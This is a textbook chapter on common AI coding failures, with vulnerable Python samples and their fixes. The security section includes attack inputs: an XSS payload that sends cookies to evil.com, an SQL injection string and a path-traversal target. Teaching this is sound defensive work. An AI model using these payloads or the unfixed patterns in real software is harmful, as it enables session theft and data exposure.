Chapter 14: When AI Gets It Wrong

> "The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law


Learning Objectives

By the end of this chapter, you will be able to:

  • Remember the major categories of AI coding failures and recognize examples of each (Bloom's: Remember)
  • Understand why AI models produce hallucinated APIs, subtle logic errors, and security vulnerabilities (Bloom's: Understand)
  • Analyze AI-generated code for common failure patterns including off-by-one errors, race conditions, and performance anti-patterns (Bloom's: Analyze)
  • Evaluate the confidence level of AI-generated code and identify situations where the AI is likely wrong despite sounding certain (Bloom's: Evaluate)
  • Apply systematic debugging approaches specifically designed for AI-generated code (Bloom's: Apply)
  • Create verification workflows that catch AI mistakes before they reach production (Bloom's: Create)

Introduction

Every chapter of this book so far has celebrated what AI coding assistants can do. This chapter is different. This chapter is about what they get wrong — and they get things wrong often.

If you have been following along, you have probably already encountered moments where AI-generated code looked correct, ran without errors on your first test, and then failed spectacularly under real-world conditions. Perhaps a library import referenced a package that does not exist. Perhaps a loop processed one too many or one too few items. Perhaps the code worked perfectly — except it was wide open to SQL injection.

This chapter is not meant to scare you away from AI-assisted development. It is meant to make you better at it. The developers who struggle most with vibe coding are not those who lack programming skill — they are the ones who trust AI output without verification. The developers who thrive are those who have internalized what we call the trust-but-verify mindset: use AI as a powerful collaborator, but always validate its work.

We will build a comprehensive taxonomy of AI coding failures, examine real examples of each failure type, develop systematic debugging strategies, and learn recovery techniques for when a conversation with an AI assistant goes off the rails. By the end, you will have the skills to catch AI mistakes before your users do.

Note: This chapter builds directly on the code review skills from Chapter 7. If you skipped that chapter, consider reading Section 7.6 (Spotting Potential Issues) before continuing.


14.1 The Taxonomy of AI Coding Failures

Before we dive into specific failure types, it helps to have a map of the territory. AI coding failures fall into several distinct categories, each with different causes, detection difficulty, and potential impact.

The Failure Spectrum

AI coding failures range from immediately obvious to deeply hidden:

| Category | Detection Difficulty | Typical Impact | Example |
| --- | --- | --- | --- |
| Hallucinated APIs | Easy (import fails) | Build failure | from sklearn.neural import DeepClassifier |
| Syntax errors | Easy (interpreter catches) | Build failure | Mismatched parentheses, invalid Python |
| Runtime errors | Medium (fails on execution) | Crash | TypeError from wrong argument types |
| Logic errors | Hard (produces wrong results) | Silent data corruption | Off-by-one in loop bounds |
| Security vulnerabilities | Hard (works correctly but unsafely) | Data breach | SQL injection, XSS, hardcoded secrets |
| Performance anti-patterns | Hard (works but slowly) | Degraded user experience | N+1 queries, blocking I/O |
| Outdated patterns | Medium (may work but deprecated) | Technical debt | Using removed APIs, old syntax |
| Architectural issues | Very hard (works at small scale) | Scalability failure | Tight coupling, missing abstractions |

Why AI Gets Things Wrong

Understanding why AI makes mistakes helps you predict when it will make them. The root causes include:

Training data mixture. AI models learn from vast corpora of code, which includes both excellent code and terrible code. The model does not inherently know which is which. Code from Stack Overflow answers, tutorials written by beginners, and outdated blog posts all contribute to the training data alongside production-quality code.

Statistical pattern matching. Language models predict the most likely next token based on patterns in training data. When a pattern is common but wrong — such as a frequently repeated security anti-pattern — the model may reproduce it confidently.

Knowledge cutoff. Models have a training data cutoff date. APIs change, libraries release new major versions, and best practices evolve. The model does not know about these changes.

Context limitations. Models work within a limited context window. When your project grows beyond what fits in context, the model may lose track of important constraints, data types, or architectural decisions made earlier.

The completion imperative. AI assistants are trained to be helpful and to provide complete answers. They almost never say "I don't know" or "I'm not sure about this." When the model lacks knowledge, it generates plausible-sounding but incorrect code rather than admitting uncertainty.

Intuition: Think of AI-generated code as a first draft from a junior developer who is very well-read but has never actually run any code in production. They know patterns and conventions, but they have not felt the pain of a 2 AM production incident caused by an unhandled edge case.

The Criticality Matrix

Not all failures are equally dangerous. Use this matrix to prioritize what to verify:

| | Low Likelihood | High Likelihood |
| --- | --- | --- |
| High Impact | Security vulnerabilities, race conditions | Logic errors in business rules |
| Low Impact | Stylistic inconsistencies | Verbose or non-idiomatic code |

Always verify high-impact areas first, regardless of likelihood. A single SQL injection vulnerability matters more than a hundred stylistic issues.


14.2 Hallucinated APIs and Libraries

The most distinctive failure mode of AI coding assistants is hallucination — generating references to functions, methods, classes, or entire libraries that do not exist. This is not a bug in the traditional sense; the AI has essentially invented an API that seems like it should exist based on naming conventions and patterns in the training data.

What Hallucination Looks Like

Here is an example. You ask an AI assistant to help you with image processing, and it produces:

from PIL import Image
from PIL.Filters import AdaptiveSharpening

def enhance_image(path: str, strength: float = 0.8) -> Image.Image:
    """Enhance image sharpness using adaptive sharpening."""
    img = Image.open(path)
    sharpened = img.filter(AdaptiveSharpening(strength=strength))
    return sharpened

This code looks perfectly reasonable. The PIL library is real. The Image class is real. The coding style is correct. But PIL.Filters.AdaptiveSharpening does not exist. The AI invented it because it sounds like something that should exist in an image processing library. The actual PIL approach would use ImageFilter.SHARPEN or ImageEnhance.Sharpness.

Common Hallucination Patterns

Invented submodules. The AI correctly identifies a real library but invents a submodule within it:

# Hallucinated: requests.async does not exist
from requests.async import AsyncSession

# Real alternatives:
import aiohttp
# or
from httpx import AsyncClient

Non-existent function parameters. The function is real, but the AI adds parameters that do not exist:

# Hallucinated: 'encoding' is not a valid parameter for json.loads
data = json.loads(raw_text, encoding="utf-8")

# Correct (encoding parameter was removed in Python 3.9):
data = json.loads(raw_text)

Plausible method names. The AI generates a method name that follows the library's naming convention but does not actually exist:

# Hallucinated: pandas has no .to_nested_json() method
df.to_nested_json("output.json")

# Real approach:
df.to_json("output.json", orient="records")

Entirely fabricated libraries. Sometimes the AI invents entire packages:

# Hallucinated: this package does not exist
from datavalidator import Schema, validate_strict

# Real alternatives:
from pydantic import BaseModel
# or
from marshmallow import Schema, fields

Common Pitfall: Hallucinated package names are especially dangerous because someone could create a malicious package with that exact name on PyPI. This is called dependency confusion or typosquatting. If you pip install a hallucinated package name, you might actually install malware that someone published under that name. Always verify that a package exists and is legitimate before installing it.

How to Detect Hallucinations

Run the code immediately. The simplest test is to execute the imports. If Python raises an ImportError or ModuleNotFoundError, you have found a hallucination.

Check official documentation. Before using any API the AI suggests, verify it exists in the official documentation. This takes seconds and prevents hours of debugging.

Use your IDE. Modern IDEs with language server support will flag unresolved imports with red underlines before you even run the code.

Search PyPI for packages. If the AI suggests a library you have not heard of, search for it on pypi.org before running pip install.

Verify on the REPL. Open a Python REPL and try:

import some_module
dir(some_module)  # List actual attributes
help(some_module.some_function)  # Check actual signature

Best Practice: Build a habit of verifying every import that an AI suggests if you are not already familiar with the library. This single practice will eliminate the most embarrassing category of AI-generated bugs.


14.3 Subtle Logic Errors

Logic errors are far more dangerous than hallucinated APIs because the code runs without errors — it just produces wrong results. These bugs can persist for months before anyone notices.

Off-by-One Errors

The classic off-by-one error is AI's most frequent logic mistake. Consider this AI-generated function to extract a sublist:

def get_page(items: list, page: int, page_size: int) -> list:
    """Return a page of items from a list."""
    start = page * page_size
    end = start + page_size + 1  # BUG: +1 causes overlap between pages
    return items[start:end]

The bug is on the line computing end. Python slicing already excludes the end index, so adding 1 means each page returns one extra item (overlapping with the next page). The correct version:

def get_page(items: list, page: int, page_size: int) -> list:
    """Return a page of items from a list."""
    start = page * page_size
    end = start + page_size  # Correct: Python slicing is already exclusive
    return items[start:end]

Boundary Condition Errors

AI often fails to handle empty inputs, single-element collections, or maximum values:

def find_median(numbers: list[float]) -> float:
    """Find the median of a list of numbers."""
    sorted_nums = sorted(numbers)
    mid = len(sorted_nums) // 2
    if len(sorted_nums) % 2 == 0:
        return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
    return sorted_nums[mid]

This code looks correct — and it works for most inputs. But what happens when numbers is empty? sorted_nums becomes [], mid becomes 0, and we get an IndexError. The AI did not add a guard clause:

def find_median(numbers: list[float]) -> float:
    """Find the median of a list of numbers."""
    if not numbers:
        raise ValueError("Cannot compute median of empty list")
    sorted_nums = sorted(numbers)
    mid = len(sorted_nums) // 2
    if len(sorted_nums) % 2 == 0:
        return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
    return sorted_nums[mid]
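A cheap way to gain confidence in code like this is to cross-check it against a trusted implementation. Here the corrected find_median is verified against the standard library's statistics.median on randomized inputs, including the single-element case:

```python
import random
import statistics

def find_median(numbers: list[float]) -> float:
    """Find the median of a list of numbers."""
    if not numbers:
        raise ValueError("Cannot compute median of empty list")
    sorted_nums = sorted(numbers)
    mid = len(sorted_nums) // 2
    if len(sorted_nums) % 2 == 0:
        return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
    return sorted_nums[mid]

# Randomized cross-check against the standard library's implementation
for _ in range(200):
    data = [random.uniform(-1000, 1000) for _ in range(random.randint(1, 25))]
    assert abs(find_median(data) - statistics.median(data)) < 1e-9

print("cross-check passed")
```

When a trusted reference exists, this kind of differential test costs minutes and catches both boundary bugs and outright wrong algorithms.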

Race Conditions

When AI generates concurrent code, race conditions are common because the model focuses on the happy path:

import threading

class Counter:
    """Thread-safe counter."""  # BUG: Not actually thread-safe!

    def __init__(self):
        self.value = 0

    def increment(self):
        self.value += 1  # Race condition: read-modify-write is not atomic

    def get(self) -> int:
        return self.value

The docstring says "thread-safe" but the implementation is not. The += operation involves reading the current value, adding one, and writing back — three steps that can be interleaved between threads. The fix:

import threading

class Counter:
    """Thread-safe counter using a lock."""

    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self.value += 1

    def get(self) -> int:
        with self._lock:
            return self.value
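A quick stress test confirms the locked version loses no updates. This sketch hammers the counter from eight threads; with the lock, the final count is exact:

```python
import threading

class Counter:
    """Thread-safe counter using a lock."""

    def __init__(self):
        self.value = 0
        self._lock = threading.Lock()

    def increment(self):
        with self._lock:
            self.value += 1

counter = Counter()
threads = [
    threading.Thread(target=lambda: [counter.increment() for _ in range(10_000)])
    for _ in range(8)
]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(counter.value)  # 80000 — every increment survived
```

Note that the unsafe version may also pass this test on some runs; race conditions are probabilistic, which is exactly why a docstring claiming "thread-safe" deserves scrutiny rather than trust.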

Incorrect Algorithm Implementation

Sometimes AI produces code that almost implements the right algorithm but has a subtle flaw:

def binary_search(arr: list[int], target: int) -> int:
    """Return index of target in sorted array, or -1 if not found."""
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2  # Potential integer overflow in other languages
        if arr[mid] == target:
            return mid
        elif arr[mid] < target:
            low = mid  # BUG: should be mid + 1
        else:
            high = mid  # BUG: should be mid - 1
    return -1

This binary search can enter an infinite loop. When arr[mid] < target, setting low = mid (instead of mid + 1) means that if low and high are adjacent, mid will equal low forever. The corrected version uses low = mid + 1 and high = mid - 1.
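For reference, here is the corrected implementation with the adjusted bounds, plus a probe for the missing-target case that previously looped forever:

```python
def binary_search(arr: list[int], target: int) -> int:
    """Return index of target in sorted array, or -1 if not found."""
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2
        if arr[mid] == target:
            return mid
        elif arr[mid] < target:
            low = mid + 1   # mid is already ruled out, so exclude it
        else:
            high = mid - 1  # likewise on the high side
    return -1

arr = [2, 3, 5, 7, 11, 13]
print(binary_search(arr, 11))  # 4
print(binary_search(arr, 4))   # -1 — terminates instead of looping forever
```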

Real-World Application: In production systems, subtle logic errors in data processing pipelines can corrupt millions of records before anyone notices. One real-world example involved an AI-generated ETL (Extract, Transform, Load) script that had an off-by-one error in date range filtering. It skipped the first day of every month, leading to systematic data loss that was not caught for three weeks.

Incorrect Regular Expressions

AI frequently generates regex patterns that are close but not quite right:

import re

def validate_email(email: str) -> bool:
    """Validate an email address."""
    pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    return bool(re.match(pattern, email))

This pattern looks reasonable but rejects valid emails with characters like !, #, or ' in the local part (which are technically allowed by RFC 5321). It also accepts user@-example.com (a domain label starting with a hyphen) and user@com..example (consecutive dots in the domain). Email validation is notoriously hard, and AI tends to produce the "common but wrong" regex from countless Stack Overflow answers.

Common Pitfall: Be especially suspicious of AI-generated regular expressions. They frequently handle the common cases correctly while failing on edge cases. Always test regex patterns with a comprehensive set of both valid and invalid inputs, including edge cases.
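A small harness makes those blind spots concrete. The assertions below document what the happy-path pattern from above actually accepts and rejects (True means "accepted"):

```python
import re

pattern = re.compile(r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$')

cases = {
    "alice@example.com": True,     # fine
    "o'brien@example.com": False,  # rejected, though RFC 5321 allows the apostrophe
    "user@com..example": True,     # accepted, though consecutive dots are invalid
    "user@-example.com": True,     # accepted, though a label cannot start with '-'
}
for email, accepted in cases.items():
    assert bool(pattern.match(email)) == accepted

print("all expectations hold")
```

Keeping a table of known-good and known-bad inputs next to every AI-generated regex turns "looks right" into something you can actually verify.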


14.4 Security Vulnerabilities in AI Code

Security vulnerabilities in AI-generated code deserve special attention because they are simultaneously common, hard to detect, and potentially catastrophic. The model has seen millions of examples of insecure code patterns — and it reproduces them faithfully.

SQL Injection

The most classic web vulnerability, and AI generates it routinely:

def get_user(username: str) -> dict:
    """Fetch user from database."""
    query = f"SELECT * FROM users WHERE username = '{username}'"  # VULNERABLE
    cursor.execute(query)
    return cursor.fetchone()

If username is ' OR '1'='1' --, this query returns all users. The fix is parameterized queries:

def get_user(username: str) -> dict:
    """Fetch user from database."""
    query = "SELECT * FROM users WHERE username = %s"  # Safe: parameterized
    cursor.execute(query, (username,))
    return cursor.fetchone()
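The difference is easy to demonstrate with the standard library's sqlite3 (which uses ? placeholders rather than %s; the table and data here are invented for the demo). The interpolated query leaks every row, while the parameterized one treats the payload as an ordinary string:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "alice-secret"), ("bob", "bob-secret")])

payload = "' OR '1'='1"

# Vulnerable: string interpolation lets the payload rewrite the WHERE clause
leaked = conn.execute(
    f"SELECT * FROM users WHERE username = '{payload}'"
).fetchall()

# Safe: the payload is compared as a literal string, matching no user
safe = conn.execute(
    "SELECT * FROM users WHERE username = ?", (payload,)
).fetchall()

print(len(leaked), len(safe))  # 2 0 — the injection returns every row
```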

Common Pitfall: AI assistants will sometimes generate parameterized queries in some functions and string-concatenated queries in others within the same codebase. Inconsistency is the enemy of security. Review every database query, not just the ones that look suspicious.

Cross-Site Scripting (XSS)

When generating web code, AI often fails to escape user input:

from flask import Flask, request

app = Flask(__name__)

@app.route('/search')
def search():
    query = request.args.get('q', '')
    # VULNERABLE: user input directly in HTML
    return f"<h1>Search results for: {query}</h1>"

An attacker can inject <script>document.location='http://evil.com/steal?c='+document.cookie</script> as the query parameter. The fix uses proper escaping:

from flask import Flask, request
from markupsafe import escape

app = Flask(__name__)

@app.route('/search')
def search():
    query = request.args.get('q', '')
    return f"<h1>Search results for: {escape(query)}</h1>"  # Safe: escaped

Hardcoded Secrets

AI assistants frequently generate code with placeholder secrets that look like they should be replaced but sometimes are not:

import jwt

SECRET_KEY = "super-secret-key-change-me"  # VULNERABLE: hardcoded secret

def create_token(user_id: int) -> str:
    return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")

The fix uses environment variables:

import os
import jwt

SECRET_KEY = os.environ["JWT_SECRET_KEY"]  # Safe: from environment

def create_token(user_id: int) -> str:
    return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")

Path Traversal

AI-generated file-handling code often fails to validate paths:

from flask import Flask, send_file, request

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: allows ../../etc/passwd
    return send_file(f'/uploads/{filename}')

The fix validates the resolved path:

import os
from pathlib import Path
from flask import Flask, send_file, request, abort

app = Flask(__name__)
UPLOAD_DIR = Path('/uploads').resolve()

@app.route('/download')
def download():
    filename = request.args.get('file')
    if not filename:
        abort(400)
    file_path = (UPLOAD_DIR / filename).resolve()
    if not str(file_path).startswith(str(UPLOAD_DIR)):
        abort(403)  # Path traversal attempt
    if not file_path.is_file():
        abort(404)
    return send_file(file_path)
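On Python 3.9+, Path.is_relative_to expresses the containment check more robustly than the startswith comparison above, which would wrongly accept a sibling directory such as /uploads-evil. The is_safe helper below is a sketch of that idea (the name is ours):

```python
from pathlib import Path

def is_safe(base: Path, user_supplied: str) -> bool:
    """True only if user_supplied resolves to a location inside base."""
    resolved = (base / user_supplied).resolve()
    # Python 3.9+: avoids the startswith() prefix pitfall, where a sibling
    # directory like /uploads-evil would pass a naive startswith('/uploads')
    return resolved.is_relative_to(base)

base = Path("/uploads").resolve()
print(is_safe(base, "report.pdf"))        # True
print(is_safe(base, "../../etc/passwd"))  # False
```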

Insecure Deserialization

AI sometimes suggests pickle for data serialization without warning about the dangers:

import pickle

def load_user_data(data_bytes: bytes) -> dict:
    """Load user-submitted data."""
    return pickle.loads(data_bytes)  # VULNERABLE: arbitrary code execution

Using pickle.loads on untrusted data allows arbitrary code execution. If the data comes from a user or external source, use json instead:

import json

def load_user_data(data_bytes: bytes) -> dict:
    """Load user-submitted data."""
    return json.loads(data_bytes)  # Safe: JSON cannot execute code
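The danger is easy to demonstrate: during loads, pickle will call whatever callable the payload names in its __reduce__ hook. Here the callable is a harmless sorted, but nothing stops an attacker from naming os.system instead:

```python
import pickle

class Malicious:
    def __reduce__(self):
        # On unpickling, pickle calls this callable with these arguments.
        # sorted() is harmless; an attacker would supply os.system.
        return (sorted, ("cba",))

payload = pickle.dumps(Malicious())
result = pickle.loads(payload)
print(result)  # ['a', 'b', 'c'] — a function of the payload's choosing just ran
```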

Weak Cryptography

AI models sometimes suggest outdated or weak cryptographic algorithms:

import hashlib

def hash_password(password: str) -> str:
    """Hash a password for storage."""
    return hashlib.md5(password.encode()).hexdigest()  # VULNERABLE: MD5 is broken

MD5 is cryptographically broken and unsuitable for password hashing. Even SHA-256 alone is not appropriate for passwords (it is too fast). The correct approach uses a purpose-built password hashing function:

import bcrypt

def hash_password(password: str) -> bytes:
    """Hash a password for storage using bcrypt."""
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt())

def verify_password(password: str, hashed: bytes) -> bool:
    """Verify a password against its hash."""
    return bcrypt.checkpw(password.encode(), hashed)
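If adding the bcrypt dependency is not an option, the standard library's hashlib.pbkdf2_hmac is also purpose-built for password hashing. This sketch uses our own function names; the iteration count reflects commonly cited guidance for PBKDF2-SHA256, not a hard rule:

```python
import hashlib
import hmac
import os

def hash_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    """Hash a password with PBKDF2-HMAC-SHA256 and a fresh random salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = 600_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("wrong guess", salt, digest))                   # False
```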

Best Practice: For security-critical code, never accept AI output at face value. Cross-reference against the OWASP Top 10 (owasp.org/www-project-top-ten) and use security-focused static analysis tools like bandit for Python. The few minutes this takes can prevent catastrophic breaches.


14.5 Performance Anti-Patterns

AI-generated code often prioritizes readability and correctness over performance. While this is usually the right trade-off for prototypes, it can create serious problems in production systems.

The N+1 Query Problem

This is the most common performance anti-pattern in AI-generated database code:

def get_all_orders_with_customers(db_session):
    """Get all orders with customer details."""
    orders = db_session.query(Order).all()  # 1 query
    result = []
    for order in orders:
        customer = db_session.query(Customer).get(order.customer_id)  # N queries
        result.append({
            "order_id": order.id,
            "total": order.total,
            "customer_name": customer.name
        })
    return result

For 1,000 orders, this executes 1,001 database queries. The fix uses a JOIN or eager loading:

def get_all_orders_with_customers(db_session):
    """Get all orders with customer details using a JOIN."""
    results = (
        db_session.query(Order, Customer)
        .join(Customer, Order.customer_id == Customer.id)
        .all()
    )
    return [
        {
            "order_id": order.id,
            "total": order.total,
            "customer_name": customer.name
        }
        for order, customer in results
    ]
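You can watch the query counts diverge with the standard library's sqlite3, using set_trace_callback to log every statement the connection executes (the schema and data here are invented for the demo):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE orders (id INTEGER PRIMARY KEY, customer_id INTEGER, total REAL);
    INSERT INTO customers VALUES (1, 'Ada'), (2, 'Grace');
    INSERT INTO orders VALUES (1, 1, 9.99), (2, 2, 5.00), (3, 1, 12.50);
""")

queries = []
conn.set_trace_callback(queries.append)  # record every statement executed

# N+1 style: one query for the orders, then one more per order for its customer
orders = conn.execute("SELECT id, customer_id, total FROM orders").fetchall()
for _, customer_id, _ in orders:
    conn.execute("SELECT name FROM customers WHERE id = ?",
                 (customer_id,)).fetchone()
n_plus_one = len(queries)

queries.clear()
# JOIN style: the same data in a single round trip
conn.execute(
    "SELECT o.id, o.total, c.name FROM orders o "
    "JOIN customers c ON o.customer_id = c.id"
).fetchall()
joined = len(queries)

print(n_plus_one, joined)  # 4 1
```

Three orders already cost four queries; a thousand would cost a thousand and one, while the JOIN stays at one.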

Unnecessary Data Copying

AI frequently generates code that copies data structures unnecessarily:

def process_large_dataset(data: list[dict]) -> list[dict]:
    """Process and filter a large dataset."""
    # Unnecessary copy: sorted() creates a new list
    sorted_data = sorted(data, key=lambda x: x['timestamp'])
    # Another copy: list comprehension creates another new list
    filtered = [item for item in sorted_data if item['status'] == 'active']
    # Yet another copy: another list comprehension
    result = [
        {**item, 'processed': True}
        for item in filtered
    ]
    return result

For a dataset of millions of records, this creates three full copies. A more memory-efficient approach sorts in place and fuses the filter and transform into a single pass:

def process_large_dataset(data: list[dict]) -> list[dict]:
    """Process and filter a large dataset efficiently."""
    data.sort(key=lambda x: x['timestamp'])  # In-place sort
    return [
        {**item, 'processed': True}
        for item in data
        if item['status'] == 'active'
    ]

Blocking I/O in Async Code

AI sometimes mixes synchronous and asynchronous patterns:

import asyncio
import requests  # Synchronous library!

async def fetch_all_urls(urls: list[str]) -> list[str]:
    """Fetch all URLs concurrently."""
    results = []
    for url in urls:
        # BUG: requests.get is blocking, defeats the purpose of async
        response = requests.get(url)
        results.append(response.text)
    return results

This code uses async but makes blocking HTTP calls, so nothing actually runs concurrently. The fix uses an async HTTP library:

import asyncio
import aiohttp

async def fetch_all_urls(urls: list[str]) -> list[str]:
    """Fetch all URLs concurrently."""
    async with aiohttp.ClientSession() as session:
        tasks = [fetch_one(session, url) for url in urls]
        return await asyncio.gather(*tasks)

async def fetch_one(session: aiohttp.ClientSession, url: str) -> str:
    """Fetch a single URL."""
    async with session.get(url) as response:
        return await response.text()
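The payoff of truly non-blocking calls is easy to measure even without a network. Substituting asyncio.sleep for the HTTP round trip (fake_fetch is a stand-in, not a real client), ten concurrent "fetches" complete in roughly the time of one:

```python
import asyncio
import time

async def fake_fetch(url: str) -> str:
    await asyncio.sleep(0.1)  # stands in for a non-blocking network round trip
    return f"body of {url}"

async def main() -> None:
    urls = [f"https://example.com/page/{i}" for i in range(10)]
    start = time.perf_counter()
    results = await asyncio.gather(*(fake_fetch(u) for u in urls))
    elapsed = time.perf_counter() - start
    # The ten 0.1s waits overlap: total is ~0.1s, not ~1.0s as with blocking calls
    print(f"{len(results)} fetches in {elapsed:.2f}s")

asyncio.run(main())
```

If a version with blocking calls takes ten times longer here, you have found the same bug as in the requests example above.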

Quadratic Algorithms Hidden in Clean Code

Sometimes AI generates beautifully readable code that hides O(n^2) complexity:

def find_duplicates(items: list[str]) -> list[str]:
    """Find duplicate items in a list."""
    duplicates = []
    for item in items:
        if items.count(item) > 1 and item not in duplicates:  # O(n) * 2 per iteration
            duplicates.append(item)
    return duplicates

The items.count() call is O(n) and item not in duplicates is also O(n), making this O(n^2). For a list of 100,000 items, this becomes unusably slow. The fix uses collections.Counter to count every item in a single pass:

from collections import Counter

def find_duplicates(items: list[str]) -> list[str]:
    """Find duplicate items in a list."""
    counts = Counter(items)  # O(n)
    return [item for item, count in counts.items() if count > 1]  # O(n)

Advanced: When reviewing AI-generated code for performance, mentally trace the time complexity of each line. Look for nested loops, .count() calls inside loops, in checks on lists (O(n)) versus sets (O(1)), and string concatenation in loops (which creates a new string each iteration).


14.6 Outdated Patterns and Deprecated APIs

AI models are trained on historical data, which means they sometimes suggest patterns that were appropriate years ago but are now outdated or deprecated.

Python 2 Remnants

Even though Python 2 reached end-of-life in January 2020, AI occasionally generates Python 2 patterns:

# Outdated: Python 2 style print statement
print "Hello, world"

# Outdated: Python 2 style string formatting
message = "Hello, %s. You are %d years old." % (name, age)

# Outdated: Python 2 style exception handling
try:
    risky_operation()
except Exception, e:
    print e

# Outdated: inheriting from object explicitly (unnecessary in Python 3)
class MyClass(object):
    pass

The modern Python 3 equivalents:

print("Hello, world")
message = f"Hello, {name}. You are {age} years old."

try:
    risky_operation()
except Exception as e:
    print(e)

class MyClass:
    pass

Deprecated Standard Library Usage

# Deprecated: asyncio.get_event_loop() in Python 3.10+
loop = asyncio.get_event_loop()
loop.run_until_complete(main())

# Modern:
asyncio.run(main())

# Deprecated: using typing.List, typing.Dict in Python 3.9+
from typing import List, Dict
def process(items: List[Dict[str, int]]) -> List[str]:
    pass

# Modern: use built-in types directly
def process(items: list[dict[str, int]]) -> list[str]:
    pass

# Deprecated: os.path for path manipulation
import os
path = os.path.join(base_dir, "data", "file.txt")
exists = os.path.exists(path)

# Modern: pathlib
from pathlib import Path
path = Path(base_dir) / "data" / "file.txt"
exists = path.exists()

Framework-Specific Deprecations

AI often suggests deprecated patterns from popular frameworks:

# Older Flask pattern (before the 2.0 shorthand decorators)
@app.route('/users', methods=['GET'])
def get_users():
    pass

@app.route('/users', methods=['POST'])
def create_user():
    pass

# Modern Flask (2.0+)
@app.get('/users')
def get_users():
    pass

@app.post('/users')
def create_user():
    pass

# Deprecated SQLAlchemy 1.x query style
users = session.query(User).filter(User.age > 18).all()

# Modern SQLAlchemy 2.x style
from sqlalchemy import select
stmt = select(User).where(User.age > 18)
users = session.execute(stmt).scalars().all()

Best Practice: When an AI suggests a library pattern you are not sure about, check the library's changelog or migration guide. Search for phrases like "[library name] deprecation warnings" or "[library name] migration guide" to quickly identify whether the suggested pattern is current.

Detecting Outdated Patterns

Python's warning system can help catch deprecated usage:

import warnings
warnings.filterwarnings('error', category=DeprecationWarning)

This converts deprecation warnings into errors, making them impossible to ignore during testing. You can also use tools like pyupgrade to automatically modernize Python syntax.
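A minimal demonstration, with old_api standing in for a deprecated library function:

```python
import warnings

def old_api() -> int:
    """Hypothetical stand-in for a deprecated library function."""
    warnings.warn("old_api() is deprecated; use new_api()",
                  DeprecationWarning, stacklevel=2)
    return 42

with warnings.catch_warnings():
    # Escalate deprecation warnings to errors, as you would in a test suite
    warnings.filterwarnings("error", category=DeprecationWarning)
    try:
        old_api()
    except DeprecationWarning as exc:
        print(f"caught during tests: {exc}")
```

With this filter active in your test configuration, any deprecated pattern an AI assistant sneaks in fails loudly the first time the tests run.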


14.7 The Confidence Problem: When AI Sounds Right but Isn't

Perhaps the most insidious aspect of AI coding failures is the confidence problem. AI assistants present incorrect code with the same confident tone as correct code. There is no "I'm not sure" disclaimer, no wavering, no hedge. This makes it psychologically difficult to question AI-generated output.

Why AI Never Says "I Don't Know"

Language models generate text token by token, predicting the most probable next token based on context. They do not have an internal mechanism for evaluating their own uncertainty. The model does not think, "I'm 40% confident in this function" — it simply generates the most likely completion given the prompt.

This means:

  • Completely fabricated APIs are described as if they are standard library features
  • Incorrect algorithm implementations come with detailed, accurate-sounding docstrings
  • Security anti-patterns are presented alongside correct code with no distinction
  • Made-up configuration options are suggested with plausible-sounding explanations

The Expertise Illusion

AI-generated code often reads like it was written by an expert. The variable names are well-chosen, the docstrings are thorough, the code style is clean. This creates an expertise illusion where the superficial quality of the code masks substantive errors.

Consider this example:

def calculate_compound_interest(
    principal: float,
    annual_rate: float,
    years: int,
    compounding_frequency: int = 12
) -> float:
    """
    Calculate compound interest using the standard formula.

    A = P(1 + r/n)^(nt)

    Args:
        principal: Initial investment amount
        annual_rate: Annual interest rate as a decimal (e.g., 0.05 for 5%)
        years: Number of years
        compounding_frequency: Times interest is compounded per year

    Returns:
        Final amount after compound interest
    """
    amount = principal * (1 + annual_rate / compounding_frequency) ** (
        compounding_frequency * years
    )
    return round(amount, 2)

This looks flawless. The docstring is thorough, the type hints are correct, the formula is clearly documented. But what if the caller passes annual_rate=5 (meaning 5%) instead of annual_rate=0.05? The function will silently return an astronomically wrong result. An experienced developer would add validation:

if annual_rate > 1:
    raise ValueError(
        f"annual_rate={annual_rate} seems too high. "
        f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
    )

The AI's polished presentation made it easy to skip critical review.
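One habit that defeats the expertise illusion is to run every polished-looking function against a case you can verify by hand. With the suggested guard added, the check looks like this:

```python
def calculate_compound_interest(principal: float, annual_rate: float, years: int,
                                compounding_frequency: int = 12) -> float:
    """Calculate compound interest: A = P(1 + r/n)^(nt)."""
    if annual_rate > 1:
        raise ValueError(
            f"annual_rate={annual_rate} seems too high. "
            f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
        )
    amount = principal * (1 + annual_rate / compounding_frequency) ** (
        compounding_frequency * years
    )
    return round(amount, 2)

# Hand-checkable case: 1000 at 10%, compounded once a year for 2 years,
# is 1000 * 1.1 * 1.1 = 1210
assert calculate_compound_interest(1000, 0.10, 2, compounding_frequency=1) == 1210.00

# The guard now rejects the percent-instead-of-decimal mistake
try:
    calculate_compound_interest(1000, 5, 2)
except ValueError as exc:
    print(f"rejected: {exc}")
```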

Signals That AI Might Be Wrong

